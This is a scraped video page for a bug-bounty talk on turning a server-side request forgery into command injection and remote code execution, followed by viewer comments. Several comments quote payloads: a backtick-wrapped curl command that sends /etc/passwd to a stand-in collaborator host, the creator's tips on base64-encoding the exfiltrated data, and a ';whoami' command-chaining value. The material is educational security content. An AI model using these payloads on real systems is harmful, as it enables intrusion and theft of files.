From a lame Server-Side Request Forgery to Remote Code Execution

Поделиться
HTML-код
  • Опубликовано: 7 окт 2024

Комментарии • 94

  • @SB-rf2ye
    @SB-rf2ye 4 года назад +2

    That's effin' diabolical mate. Great explanation! Really enjoying your channel.

  • @charchitsharma4559
    @charchitsharma4559 4 года назад +7

    That's a great find.. learned something new today.✌️

    • @thehackerish
      @thehackerish  4 года назад +1

      Happy to hear that!

    • @francisdonald4298
      @francisdonald4298 2 года назад

      @@thehackerish example where do u put commands outside the the quotes of server address or??

  • @arpeetrathi
    @arpeetrathi 4 года назад

    Was simple, but never thought about it. Thanks for it!

  • @goodboy8833
    @goodboy8833 4 года назад

    I love this Channel, he does very elegant, explicit demonstration, hope u post more videos on ssrf and xss

  • @msalih
    @msalih Год назад

    Hi! Thanks for the awesome content.

  • @Free.Education786
    @Free.Education786 3 года назад +1

    Thank you brother. You and your channel is world best channel who teaches noobes from 0 2 h3r0. Love U Respect U Salute U 🤝❤💙💚💐👍

    • @thehackerish
      @thehackerish  3 года назад

      Oh! What a kind comment! I am humbled, Enjoy!!!

  • @arjunpeter9614
    @arjunpeter9614 4 года назад

    Marvelous explain 👍 keep doing, bro

  • @01zoso
    @01zoso 4 года назад +1

    Great video, thanks for sharing 👍

  • @emilioastier
    @emilioastier 3 года назад

    great video. thank you very much for the content and the teaching

    • @thehackerish
      @thehackerish  3 года назад

      Thank you for your kind feedback, Enjoy!

  • @densi97
    @densi97 4 года назад +2

    great video! If you already have access to your target, do you also look for privilege escalation to receive more bounties or do you think your work is done after initial access?

    • @thehackerish
      @thehackerish  4 года назад +3

      Great question. I reported it and asked them if they want me to escalate my privileges, but they preferred to quickly fix it.

    • @densi97
      @densi97 4 года назад

      @@thehackerish thanks for the quick reply. Good idea to first ask for permission :)

    • @francisdonald4298
      @francisdonald4298 2 года назад

      @@thehackerish hey bro your work is good u help us learn but can you please show example of request and how you add command injection since i find it harder ot do you put commands then dot burpcollaborator without quotes to the burp addrress???

  • @sushantdhopat
    @sushantdhopat 4 года назад +1

    Learn something new methodology thank for the amazing vedio 😍

  • @neetech3716
    @neetech3716 4 года назад +1

    Wow Great Suff 👍👍

  • @dhilipsanjay
    @dhilipsanjay 4 года назад

    Great explanation!!

  • @rohanrajgupta3614
    @rohanrajgupta3614 3 года назад

    You are amazing man. Love yaa ❣️

  • @zacwesleybrown
    @zacwesleybrown 3 года назад +2

    Isn't this more similar to just plain command injection? I get that it was making requests to a server but SSRF usually accesses internal services eg a Redis database which I'm sure you could have done but injecting a command into what I assume is them running a curl command on the backend seems more similar to just plain old command injection. This isn't really a usual scenario that you would encounter.

    • @thehackerish
      @thehackerish  3 года назад

      Yeah I agree on the command injection point, but the first impression you get is that it is a SSRF. However, you'd be surprised how devs can be careless, especially with deadlines and complicated architectures, so I wouldn't rule this technique out of my daily tests :)

  • @KushChoudhary
    @KushChoudhary 4 года назад

    Super Amazing! Thankyou! :)

  • @adamproof3440
    @adamproof3440 4 года назад +1

    This is stunning :o
    were the payloads are shown in the video the used or you just wrote them for explaination ?? if none please share'em wih resources & thanks a lot

    • @thehackerish
      @thehackerish  4 года назад +2

      the injection was the same. Just replaced the long collaborator URL with a short one for visual purposes.

    • @adamproof3440
      @adamproof3440 4 года назад +1

      @@thehackerish wow, that's really cool, Thanks for your replies and the (very) awesome content :)

    • @thehackerish
      @thehackerish  4 года назад +1

      @@adamproof3440 My pleasure! Thanks for your kind comment!

  • @0x_hacks
    @0x_hacks 7 месяцев назад

    Great

  • @hdphoenix29
    @hdphoenix29 3 года назад

    Great Finding ! congrats

  • @e1Pr0f3ss0r
    @e1Pr0f3ss0r 3 года назад

    Great explaination...plz include screenshots for this type of content

    • @thehackerish
      @thehackerish  3 года назад

      It's meant to be a sleep story ;) Just kidding.

  • @ashisbanerjee4584
    @ashisbanerjee4584 4 года назад +1

    Really mindblowing ,owwssaaammmmm

  • @Tchatarero36
    @Tchatarero36 Год назад

    Best Hacker ...

  • @souhaillepacifique7572
    @souhaillepacifique7572 4 года назад +2

    Thank you so much bro ❤❤

  • @astitvavarma1079
    @astitvavarma1079 3 года назад

    really interesting video

  • @mcgyver5
    @mcgyver5 3 года назад +1

    Great find! I've subscribed. The slide at 6:09 has "mycollab-server" twice. `curl -F ‘@/etc/passwd’ mycollab-server`.mycollab-server Do I understand correctly that you need to have it twice so that the .mycollab-server string at the end conforms it to what looks like a valid host name? If this is the case will your server receive two requests out of that one payload? and could the second "mycollab-server" just as well be example.com or anything else?

    • @thehackerish
      @thehackerish  3 года назад +1

      You have a sharp eye, Great question!
      Since the content of passwd does not comply with a hostname name, the request will not be performed. However, the first one will exfiltrate the passwd to your server, which could be anything else as long as it is reachable from the internet.
      If you want to receive the content in the subdomain part, you could base64 encode the file content, or a part of it.

    • @mcgyver5
      @mcgyver5 3 года назад

      @@thehackerish I get it! Thanks for your fast reply here almost a year after you posted it.

  • @bigboss_6055
    @bigboss_6055 2 года назад

    Brother you teaching is nice . But teach with some examples of site or with vulnerable site. we can understand clearly 🤝

    • @thehackerish
      @thehackerish  2 года назад

      Head over to the other playlists (web hacking training and live hacking sessions)

  • @tanercoder1915
    @tanercoder1915 4 года назад +3

    practical part for this vuln using your lab setup? wink-wink :D

  • @adtiyamuhammadakbar2711
    @adtiyamuhammadakbar2711 4 года назад +1

    i dont understand how hackers can think payload like `command`.collaborator.url
    we really need so much creativity to be a hacker?

    • @thehackerish
      @thehackerish  4 года назад

      think like a developer :) You can also build some software to get used to it!

    • @adtiyamuhammadakbar2711
      @adtiyamuhammadakbar2711 4 года назад

      @@thehackerish i dont know how to do that im completely lost the way

    • @thehackerish
      @thehackerish  4 года назад

      @@adtiyamuhammadakbar2711 there are many videos teaching how to build a web application :)

  • @KINGSTARR786
    @KINGSTARR786 3 года назад

    `command`.collaborator.url >>>> URL NOT VALID ERROR😒

  • @jitusaini6896
    @jitusaini6896 4 года назад

    Can you upload a practical video on it ???

  • @kaeyasstudio985
    @kaeyasstudio985 3 года назад

    SSTI - RCE tutorial :)

  • @MrDarkeul
    @MrDarkeul 3 года назад

    I d’ont understand why the server execute the command when you put ‘ in the url, it is standard ? Thx by advance

    • @thehackerish
      @thehackerish  3 года назад

      it's one of the ways to execute commands in Linux.

  • @antimatter6728
    @antimatter6728 3 года назад

    Sir can you tell me how did you know that your command would work if you put it in subdomain part?

    • @thehackerish
      @thehackerish  3 года назад +2

      I didn't! Hacking is all trial and error, reflex from experience, and some luck as well :) Just keep reading blogs, and learning new things.

    • @antimatter6728
      @antimatter6728 3 года назад

      @@thehackerish can i know the name of the exploit im interested in reading about it

    • @thehackerish
      @thehackerish  3 года назад

      @@antimatter6728 You mean CVE? I haven't filed one. But it's a command injection / SSRF vulnerability.

  • @sontapaa11jokulainen94
    @sontapaa11jokulainen94 3 года назад

    subbed.

  • @fahadfaisal2383
    @fahadfaisal2383 2 года назад

    How much bounty you got for this?

    • @thehackerish
      @thehackerish  2 года назад

      It says it in the title. 4k

    • @fahadfaisal2383
      @fahadfaisal2383 2 года назад

      @@thehackerish sorry bro i don't focus that !

  • @guilhemrioux2275
    @guilhemrioux2275 3 года назад

    Hey nice video ! I'm wondering, if you have enter: 'domain.com; whoami' for the command injection part, it would've worked too right ? Or did they sanitize input weirdly ? Thks

    • @thehackerish
      @thehackerish  3 года назад

      I think it would work. Actually, I might have used it to chain multiple commands, I don't remember exactly though.

  • @SumherShankal
    @SumherShankal 3 года назад

    Nice work
    Note:
    ‘pwd’.mycollaborator-url
    Will be needed to locate the users home folder 📁 path 🤔

    • @thehackerish
      @thehackerish  3 года назад +1

      As it was a service, that didn't show /home/xxx, but nice idea as well.

  • @laggybot1327
    @laggybot1327 3 года назад

    `hi`

  • @AdityaFingerstyle
    @AdityaFingerstyle 4 года назад

    So presumably, the host name you provided was run with a shell command - something like curl.
    Why would they choose to do that instead of making the request within the program (like with Axios if they're using Node backend)

    • @thehackerish
      @thehackerish  4 года назад

      Good question! They were not using using any framework and the dev made the mistake of trusting the hostname during a ssh command.

  • @Free.Education786
    @Free.Education786 3 года назад +1

    Please share how to use ACUNETIX results to exploit found vulnerabilities like SQLI XSS XSRF LFI RFI etc...bypassing WAF IDS IPS, Hash Recognition, Hash Cracking, Finding Hidden Admin Panels, bypassing admin panel or C-panels, Uploading Shell, Remote code execution-RCE, Rooting Web Server, Gain Root preveliage, Mass Defacement, Maintaining Back door, etc...

    • @thehackerish
      @thehackerish  3 года назад +1

      Would love to, but I am not familiar with acunetix scanner. It should be similar to BurpSuite Pro I guess.

    • @Free.Education786
      @Free.Education786 3 года назад +1

      @@thehackerish Yes exactly...no problem at all brother...teach us with any available tool script as per your convenience...you are excellent but I am very week in website hacking n website bug bounty hunting field as most of RUclips videos are just basic...not practical n easy to understand....You are the best teacher...May God bless you for your efforts and help 🤝❤💙💚🌹💐👍

  • @anik6393
    @anik6393 3 года назад

    Want to be ethical hacker then enrooll thehackerish❤️

  • @chaitanyacse3332
    @chaitanyacse3332 4 года назад

    Loved it..! thanks🤘

    • @thehackerish
      @thehackerish  4 года назад

    • @chaitanyacse3332
      @chaitanyacse3332 4 года назад

      @@thehackerish what if the input accepts anything after prefix only? I mean if no it throws an error..any bypass for exfiltrating metadata? (#blindssrf)🙂

    • @thehackerish
      @thehackerish  4 года назад

      @@chaitanyacse3332 In this case you can still do `inject here`.collaborator.. since this story is basically a command injection.

    • @chaitanyacse3332
      @chaitanyacse3332 4 года назад

      @@thehackerish tried the same too but its not accepting `` these quotes. Any other bypasses 😉